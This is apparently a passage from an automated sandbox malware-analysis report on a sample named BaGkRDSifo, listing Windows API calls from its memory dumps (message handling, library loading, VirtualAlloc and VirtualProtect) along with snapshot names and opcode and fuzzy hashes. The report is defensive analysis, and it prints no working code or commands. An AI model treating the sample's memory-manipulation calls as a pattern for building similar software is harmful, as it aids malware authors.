              • Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd
              Similarity
              • API ID: MessagePeek
              • String ID: fXV
              • API String ID: 2222842502-3172339192
              • Opcode ID: 2b677b2d2706753e30e296f2e486cd6cad186aa380524bf1e2dcc2f3343e6c66
              • Instruction ID: d172d355859a483031f0981487b37491d3ae9a68f6be8a2b384a15e6f26e9e7b
              • Opcode Fuzzy Hash: 2b677b2d2706753e30e296f2e486cd6cad186aa380524bf1e2dcc2f3343e6c66
              • Instruction Fuzzy Hash: D32129B5C00259DFDB20CFAAD944BDEFBF4EB08314F14842AE954A3251C378A545CF65
              APIs
              • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0B330625
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd
              Similarity
              • API ID: CallbackDispatcherUser
              • String ID: fXV
              • API String ID: 2492992576-3172339192
              • Opcode ID: cda45b5d2abdf809e6bffa50870be057f82f52f89f9db4aac890f4e70a5044a4
              • Instruction ID: b760b54bd224feafbb901535c692ab98c5a954aed8f7b0411136b6d583458591
              • Opcode Fuzzy Hash: cda45b5d2abdf809e6bffa50870be057f82f52f89f9db4aac890f4e70a5044a4
              • Instruction Fuzzy Hash: A111E4B5C002499FDB10CFAAD944BDEFBF8EB48314F14842AE954A7650D378A544CFA5
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,05AAADA1,00000800,00000000,00000000), ref: 05AAAF92
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: LibraryLoad
              • String ID: fXV
              • API String ID: 1029625771-3172339192
              • Opcode ID: b14c348bf5c7c2d32b600c042aa180654997db4596d95121b82ab0f99f29d0cd
              • Instruction ID: 8243c91a1143bb5b20257b26ae00adf0d7a09884cecae4f06d6531c32086f2c7
              • Opcode Fuzzy Hash: b14c348bf5c7c2d32b600c042aa180654997db4596d95121b82ab0f99f29d0cd
              • Instruction Fuzzy Hash: 231114B6C043488FDB24CF9AC544ADEFBF4EB48314F10842EE819A7650C375A945CFA5
              APIs
              • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0A30F8A2,00000000,00000000,041B4100,035B1A20), ref: 0A30FCF0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd
              Similarity
              • API ID: MessagePeek
              • String ID: fXV
              • API String ID: 2222842502-3172339192
              • Opcode ID: ceaaa679fefa0d808fe48f6f481e963ae02da4e9fd12ffc2aa2d9b1d8fa0b753
              • Instruction ID: 35504f7300eff827059c120a37c00096e5e533e98cedd0ef1e7ee3f4c5acc2ad
              • Opcode Fuzzy Hash: ceaaa679fefa0d808fe48f6f481e963ae02da4e9fd12ffc2aa2d9b1d8fa0b753
              • Instruction Fuzzy Hash: 7E1126B5C002499FDB20CF9AC944BDEFBF8EB48310F10802AE958A3650C378A944CFA5
              APIs
              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0A300677
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd
              Similarity
              • API ID: CallbackDispatcherUser
              • String ID: fXV
              • API String ID: 2492992576-3172339192
              • Opcode ID: 279c167ed7403f3379df615f97b9245e90107deb39b2dcfd3901694dd2a6643f
              • Instruction ID: 9e900747977cec59e9220566a455180f929d8cdacc1a4aef81bce20856ba272a
              • Opcode Fuzzy Hash: 279c167ed7403f3379df615f97b9245e90107deb39b2dcfd3901694dd2a6643f
              • Instruction Fuzzy Hash: 68113DB5800249CFDB20CF9AC545BEEFBF4EB49320F14806AE458A3751D338A644CFA5
              APIs
              • SetWindowTextW.USER32(?,00000000), ref: 06AD75BA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: TextWindow
              • String ID: fXV
              • API String ID: 530164218-3172339192
              • Opcode ID: 35d01c1a6225802c4df23c50c3bf6661c221d6ff47e1619c93eafcf91b37fa3a
              • Instruction ID: 618c13e5f3c946a5611ca0469f4343630b6e2bc2f680071445cd78b85671f066
              • Opcode Fuzzy Hash: 35d01c1a6225802c4df23c50c3bf6661c221d6ff47e1619c93eafcf91b37fa3a
              • Instruction Fuzzy Hash: 921126B6C002498FDB14CF9AC944BDEFBF4EB48310F14842AD869A7650D338A545CFA5
              APIs
              • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0B330625
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd
              Similarity
              • API ID: CallbackDispatcherUser
              • String ID: fXV
              • API String ID: 2492992576-3172339192
              • Opcode ID: fdf71e4be031d99b30b71cab4a53076e89fb823441af4fab45349b1e412dd781
              • Instruction ID: 41960f20b3d3b73e924a5bb0ff2f6c1a58053c5e168f47eaf5a60b8ae8276b71
              • Opcode Fuzzy Hash: fdf71e4be031d99b30b71cab4a53076e89fb823441af4fab45349b1e412dd781
              • Instruction Fuzzy Hash: 1611D4B5C003499FDB10CF9AD944BDEFBF8EB48714F14842AE558A3650D378A544CFA5
              APIs
              • VirtualProtect.KERNEL32(?,?,?,?), ref: 024EAD93
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2481362069.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_24e0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: ProtectVirtual
              • String ID: fXV
              • API String ID: 544645111-3172339192
              • Opcode ID: 2a208a4d7c3128a3bb135260d164911bd30d504d4c08f38d9b4e1b454fe6655e
              • Instruction ID: 5991854089d34050f3e7799ce1d3babe93da7135a42b2e74d400e70763b1822d
              • Opcode Fuzzy Hash: 2a208a4d7c3128a3bb135260d164911bd30d504d4c08f38d9b4e1b454fe6655e
              • Instruction Fuzzy Hash: 7111E2B5D002589FDB20CF9AC984ADEFBF4FB48314F10842AE859A7250C374A944CFA5
              APIs
              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0A300677
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd
              Similarity
              • API ID: CallbackDispatcherUser
              • String ID: fXV
              • API String ID: 2492992576-3172339192
              • Opcode ID: 03a33bda2f560b9845de7cf7e6e5925af84ebb6e39f6c6aa1623e99987ba8fb2
              • Instruction ID: 9039315a5b1414f983f69f4ca59336df532b2b1e1fc58acf47d46c2940909236
              • Opcode Fuzzy Hash: 03a33bda2f560b9845de7cf7e6e5925af84ebb6e39f6c6aa1623e99987ba8fb2
              • Instruction Fuzzy Hash: C2111CB5810249CFDB20CF9AC545BEEFBF4EB49324F14842AE558A3791D338A644CFA5
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd
              Similarity
              • API ID: DispatchMessage
              • String ID: fXV
              • API String ID: 2061451462-3172339192
              • Opcode ID: 5aa4b254e3b3d3b3776948d578c10bf078e2b0baa145fc72cd3653d916103615
              • Instruction ID: f649703fdec71b9a184ca1e286c22686b3f73659116c4e5e3dd2f192e9b49dd0
              • Opcode Fuzzy Hash: 5aa4b254e3b3d3b3776948d578c10bf078e2b0baa145fc72cd3653d916103615
              • Instruction Fuzzy Hash: E01113B5C042988FCB21CFAAD944BDEFFF4EB48314F10845AD458A7610C3786544CFA5
              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 06ADFD45
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: MessagePost
              • String ID: fXV
              • API String ID: 410705778-3172339192
              • Opcode ID: ef44deffc61ce9985e6ea5972a8749a8bf07d060f68393f0d8fc6dc4c58095bd
              • Instruction ID: abfef436ad079f6542e06c496fb3e97e8809dcaf39eb6b2b3289f71e981f4d57
              • Opcode Fuzzy Hash: ef44deffc61ce9985e6ea5972a8749a8bf07d060f68393f0d8fc6dc4c58095bd
              • Instruction Fuzzy Hash: 041136B58003498FDB10CF9AC945BDEFBF8EB48324F10841AE559A7650D378A944CFA5
              APIs
              • SetWindowLongW.USER32(?,?,?), ref: 05A31F95
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd
              Similarity
              • API ID: LongWindow
              • String ID: fXV
              • API String ID: 1378638983-3172339192
              • Opcode ID: a5252a69828959f13e157be3459e418b1aa11ec6c39390496f20ead5f16d9c7b
              • Instruction ID: 9f4f52091b6de180eebd707b9b41635c606017eeb48c184c86d498448a2b05ce
              • Opcode Fuzzy Hash: a5252a69828959f13e157be3459e418b1aa11ec6c39390496f20ead5f16d9c7b
              • Instruction Fuzzy Hash: AF1106B5C003489FDB10CF9AD585BDEBBF8EB49324F20841AE519A7740C375A944CFA5
              APIs
              • SendMessageW.USER32(?,00000018,00000001,?), ref: 06ADC265
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: MessageSend
              • String ID: fXV
              • API String ID: 3850602802-3172339192
              • Opcode ID: 3e2b2ed05bcb9946378ffeb4b0d2fb573baea583d9967706e30e58a8ac95ace4
              • Instruction ID: bb9d7656391d9de46e6d1ab4e38ad332fdae2cfc160dffe70faa343321bbc2dc
              • Opcode Fuzzy Hash: 3e2b2ed05bcb9946378ffeb4b0d2fb573baea583d9967706e30e58a8ac95ace4
              • Instruction Fuzzy Hash: 251133B5800348DFDB20DF9AC984BDEFBF8EB48724F10845AE529A7200D375A940CFA5
              APIs
              • GetModuleHandleW.KERNEL32(00000000), ref: 05AAAD26
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: HandleModule
              • String ID: fXV
              • API String ID: 4139908857-3172339192
              • Opcode ID: a22a11bed9be74fef27fe07dfe1509a51efef796a36c3e9bdd01bf38137eddc8
              • Instruction ID: 324ac5a5f59f224c666a0cd6f8f698345dc930be06029c1abf87256e8c00dabf
              • Opcode Fuzzy Hash: a22a11bed9be74fef27fe07dfe1509a51efef796a36c3e9bdd01bf38137eddc8
              • Instruction Fuzzy Hash: 9D11E0B6C002498FDB20CF9AD944BDEFBF4EF88214F14842AD469B7610D379A545CFA5
              APIs
              • SendMessageW.USER32(?,00000018,00000001,?), ref: 06ADC265
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: MessageSend
              • String ID: fXV
              • API String ID: 3850602802-3172339192
              • Opcode ID: a44bb82cd39f975e7f824a480f3ab905b37b3b6f4ced7b123eefdd4782e6802f
              • Instruction ID: 0b26ad7d6088a6d88ab406a88fdede9a34ea39b1e6f08d3e2b609e15f7c00ff1
              • Opcode Fuzzy Hash: a44bb82cd39f975e7f824a480f3ab905b37b3b6f4ced7b123eefdd4782e6802f
              • Instruction Fuzzy Hash: 981136B58003499FDB20DF99C984BDEFFF8EB48724F20845AE455A7650C375A540CFA5
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd
              Similarity
              • API ID: DispatchMessage
              • String ID: fXV
              • API String ID: 2061451462-3172339192
              • Opcode ID: 4a880dfee4baf47b8538a77b4782d9b73f103fb3cb979e1dc77d03a2ef082738
              • Instruction ID: 6eb8e3e9aa537019091b03be58221eba5c45115984a2f744bc5eb5e21987bdd2
              • Opcode Fuzzy Hash: 4a880dfee4baf47b8538a77b4782d9b73f103fb3cb979e1dc77d03a2ef082738
              • Instruction Fuzzy Hash: C211E0B5C00659CFCB20CF9AD944BDEFBF4EB48724F10856AE818A7610D378A544CFA5
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd
              Similarity
              • API ID: Timer
              • String ID: fXV
              • API String ID: 2870079774-3172339192
              • Opcode ID: 6adaac1837ad6ac3eb09dea0c303be0f6cdf45098507770510e184dfaefb1d55
              • Instruction ID: c8a83aafc8d0404f033a11dd3597d6e39995272a9d01b92216b57aa1e0800312
              • Opcode Fuzzy Hash: 6adaac1837ad6ac3eb09dea0c303be0f6cdf45098507770510e184dfaefb1d55
              • Instruction Fuzzy Hash: A71103B58003489FDB20CF9AC944BDEFBF8EB48314F10841AE558A7250D379AA44CFA5
              APIs
              • SendMessageW.USER32(?,?,?,?), ref: 06AD89ED
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: MessageSend
              • String ID: fXV
              • API String ID: 3850602802-3172339192
              • Opcode ID: 7ed2020b3ebb3e0f56db107e1c090d17d898f032f767a9e297a57340cb166373
              • Instruction ID: bc98630ab6ed5db407e9385ad4672485fd9bdf26e01d7e7ca1a8759d1140c685
              • Opcode Fuzzy Hash: 7ed2020b3ebb3e0f56db107e1c090d17d898f032f767a9e297a57340cb166373
              • Instruction Fuzzy Hash: FE1115B58003489FDB20DF9AC945BDEFBF8EB48310F10841AE559A7250C379A944CFA5
              APIs
              • SetWindowLongW.USER32(?,?,?), ref: 05A31F95
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd
              Similarity
              • API ID: LongWindow
              • String ID: fXV
              • API String ID: 1378638983-3172339192
              • Opcode ID: 414e79d0af2d275d665c289ccde35b7620244b4bc04d512b6cf844cf905f928b
              • Instruction ID: 570ccf8a7e68ce5f95bde810200cc4e38a63cc1f4de1886f9fcc03b128dc36a8
              • Opcode Fuzzy Hash: 414e79d0af2d275d665c289ccde35b7620244b4bc04d512b6cf844cf905f928b
              • Instruction Fuzzy Hash: 341115B58003488FDB20CF9AC585BDEFBF8EB48324F20841AE919A7740C374A944CFA5
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd
              Similarity
              • API ID: Timer
              • String ID: fXV
              • API String ID: 2870079774-3172339192
              • Opcode ID: f405f7cb92b301587859018febf0f17380607f361666cff74b3ddaedfacd5c30
              • Instruction ID: 2bf85896d8f7a4098b970a7a8dfe226d8f80d74993d7831ee37ac12d88ccb2fb
              • Opcode Fuzzy Hash: f405f7cb92b301587859018febf0f17380607f361666cff74b3ddaedfacd5c30
              • Instruction Fuzzy Hash: 441115B58003489FDB20CF9AC944BDEFBF8EB48314F10841AE558A7250C379AA44CFA5
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd
              Similarity
              • API ID: DispatchMessage
              • String ID: fXV
              • API String ID: 2061451462-3172339192
              • Opcode ID: 33db174b24b9ffe73f13ba4f40c18c3e6ec7327f1603082bc2e77af6cf63463a
              • Instruction ID: 14df79f3387b580faddaaa918f10af5a3a8261743b5ce06612ada9489062aeda
              • Opcode Fuzzy Hash: 33db174b24b9ffe73f13ba4f40c18c3e6ec7327f1603082bc2e77af6cf63463a
              • Instruction Fuzzy Hash: 8C1100B5C002498FCB24CF9AD944BCEFBF4EB48314F20842AD419A3610D378A544CFA5
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd
              Similarity
              • API ID: DispatchMessage
              • String ID: fXV
              • API String ID: 2061451462-3172339192
              • Opcode ID: 4bb08a0e20d02b12cb17dc1b692b75e9a4652dab41c15516de71493839eb8f3e
              • Instruction ID: f662ba8ae284c76fc454a3d4a90842f97870bc315f3a8f387c3c3c6a2cef7266
              • Opcode Fuzzy Hash: 4bb08a0e20d02b12cb17dc1b692b75e9a4652dab41c15516de71493839eb8f3e
              • Instruction Fuzzy Hash: 0D1100B5C002588FCB20CFAAD944BCEFBF4EB48714F20842AE418A3610D378A544CFA5
              APIs
              • VirtualAlloc.KERNEL32(?,?,?,?), ref: 024EB9D8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2481362069.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_24e0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID: fXV
              • API String ID: 4275171209-3172339192
              • Opcode ID: 96e236b82eb15ea92fb8dff418aefb2e939a1e3f48715f405f3094886fe6c5d6
              • Instruction ID: e465b52021c0288e06679641d55e3561edf3281596e0b22959ad8c3f45db5cca
              • Opcode Fuzzy Hash: 96e236b82eb15ea92fb8dff418aefb2e939a1e3f48715f405f3094886fe6c5d6
              • Instruction Fuzzy Hash: BD1102B69002489FDB20DFAAC944BDEFBF4EB48324F20841AE559A7250C375A944CFA5
              APIs
              • KiUserCallbackDispatcher.NTDLL(00000014,?,?,041B4100,035B1A20,?,00000000), ref: 06AC2436
              Memory Dump Source
              • Source File: 00000000.00000002.2491182713.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ac0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: CallbackDispatcherUser
              • String ID:
              • API String ID: 2492992576-0
              • Opcode ID: 377cd4ecf01d6dbc2c6329198178b40a73bfd4dea7d2fb6ce0dab3ca3324bd88
              • Instruction ID: fbe85799458d5b4f77b948fef908fbe8ff008fce7f17e751070e1ae003cab633
              • Opcode Fuzzy Hash: 377cd4ecf01d6dbc2c6329198178b40a73bfd4dea7d2fb6ce0dab3ca3324bd88
              • Instruction Fuzzy Hash: 11718E74A11208EFCB54DF69D984E9EBBB6FF48724B114098F905AB361DB31ED81CB50
              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 06ADFD45
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: 8749a5435f88447ef7289d481ac380b8533f426f928f54253517b5b238f0cf6d
              • Instruction ID: ae748f9fd395fc0635864d226f77ef276723e61ac05c962a57b3e29b3c19f842
              • Opcode Fuzzy Hash: 8749a5435f88447ef7289d481ac380b8533f426f928f54253517b5b238f0cf6d
              • Instruction Fuzzy Hash: F331A976E003058FDB64EF69C8447AFBBF5AF89214F18442ED487AB691DB34D845CBA0
              APIs
              • KiUserCallbackDispatcher.NTDLL(00000003,00000000,00000000,?,?,?,00000000), ref: 0A3039A6
              Memory Dump Source
              • Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd
              Similarity
              • API ID: CallbackDispatcherUser
              • String ID:
              • API String ID: 2492992576-0
              • Opcode ID: e32274e055ea78796ec0ea1b1237e6355fa51d472ac832eaa6632b2de2c5bbb6
              • Instruction ID: 1a53fe246884300cb197c67d52beb03da4a80e62c9e0ac0edfe46562bfff9f40
              • Opcode Fuzzy Hash: e32274e055ea78796ec0ea1b1237e6355fa51d472ac832eaa6632b2de2c5bbb6
              • Instruction Fuzzy Hash: D821CA32B001149BEB14DB6AEC11FAAB766EFC4324F098169E5099B791CB70EC61CBD4
              APIs
                • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
              • SysAllocString.OLEAUT32 ref: 00401898
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: AllocString_malloc
              • String ID:
              • API String ID: 959018026-0
              • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
              • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
              • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
              • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
              APIs
              • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: CreateHeap
              • String ID:
              • API String ID: 10892065-0
              • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
              • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
              • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
              • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
              APIs
              • _malloc.LIBCMT ref: 0040AD5A
                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: AllocateHeap_malloc
              • String ID:
              • API String ID: 501242067-0
              • Opcode ID: 3374a06f9b3d2d068d2f82a32e0eba00299d11aef8e131c065cca21440f1d622
              • Instruction ID: 1d107a11a906ec6b97ad05ef89e0782f1ba8d3b6ff8f86867a68f26e47426dd2
              • Opcode Fuzzy Hash: 3374a06f9b3d2d068d2f82a32e0eba00299d11aef8e131c065cca21440f1d622
              • Instruction Fuzzy Hash: 8DB012B7804201ABC504E650E58680BB7DCEAE0200F81C879F04886070D338E504874B
              Memory Dump Source
              • Source File: 00000000.00000002.2480470502.000000000243D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0243D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_243d000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1e3ba990d44efb7c4d3001985ddeee2b808f960bc2e7a48461bba1e5478b34e6
              • Instruction ID: 079610881bf457a4ced8d2dc987878b06c9dcf79394f2e34f4debd25568d6c70
              • Opcode Fuzzy Hash: 1e3ba990d44efb7c4d3001985ddeee2b808f960bc2e7a48461bba1e5478b34e6
              • Instruction Fuzzy Hash: 7621F5B1A04244DFDF16DF10D9C0B1BBBA5FB8C714F24856AE91D0B356C336D456CAA2
              Memory Dump Source
              • Source File: 00000000.00000002.2480470502.000000000243D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0243D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_243d000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8e19edeb7ff5a604a1dcad795a8886eb2c34f6c3216ea631cb705646d281ee6f
              • Instruction ID: 1dd8e37595fda183174f8db9fb66c32e9b8515dae692da6b49fc9bef092c6b67
              • Opcode Fuzzy Hash: 8e19edeb7ff5a604a1dcad795a8886eb2c34f6c3216ea631cb705646d281ee6f
              • Instruction Fuzzy Hash: AE21C5B2904244EFDF16DF14D9C0B27BFA5FB88318F24856AE9090F356C336D556CAA2
              Memory Dump Source
              • Source File: 00000000.00000002.2480709451.000000000244D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_244d000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
